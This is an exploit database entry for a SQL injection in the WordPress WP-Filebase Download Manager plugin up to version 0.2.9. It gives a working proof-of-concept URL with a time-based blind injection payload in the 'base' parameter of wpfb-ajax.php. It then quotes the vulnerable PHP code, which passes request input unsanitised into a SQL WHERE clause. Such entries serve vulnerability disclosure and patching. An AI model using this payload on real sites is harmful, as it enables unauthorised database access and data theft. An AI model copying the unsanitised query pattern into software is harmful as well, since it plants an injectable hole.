WordPress Plugin WP-Filebase Download Manager 0.2.9 - SQL Injection

EDB-ID:

17808

CVE:





Platform:

PHP

Date:

2011-09-09


# Exploit Title: WordPress WP-Filebase Download Manager plugin <= 0.2.9 SQL Injection Vulnerability
# Date: 2011-09-09
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/wp-filebase.0.2.9.zip
# Version: 0.2.9 (tested)

---
PoC
---
http://www.site.com/wp-content/plugins/wp-filebase/wpfb-ajax.php?action=tree&base=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20&root=source

---------------
Vulnerable code
---------------
if(!isset($_REQUEST['action']))
    die('-1');
...
switch ( $action = $_REQUEST['action'] ) {
    case 'tree':
        ...
        $base_id = (empty($_REQUEST['base']) ? 0 : $_REQUEST['base']);
        ...
        if(empty($_REQUEST['root']) || $_REQUEST['root'] == 'source')
            $parent_id = $base_id;
        else {
            $root = $_REQUEST['root'];
            $parent_id = is_numeric($root) ? intval($root) : intval(substr(strrchr($root,'-'),1));
        }
        ...
        $cats = $browser ? WPFB_Category::GetFileBrowserCats($parent_id) : WPFB_Category::GetCats("WHERE cat_parent = $parent_id ORDER BY cat_name ASC");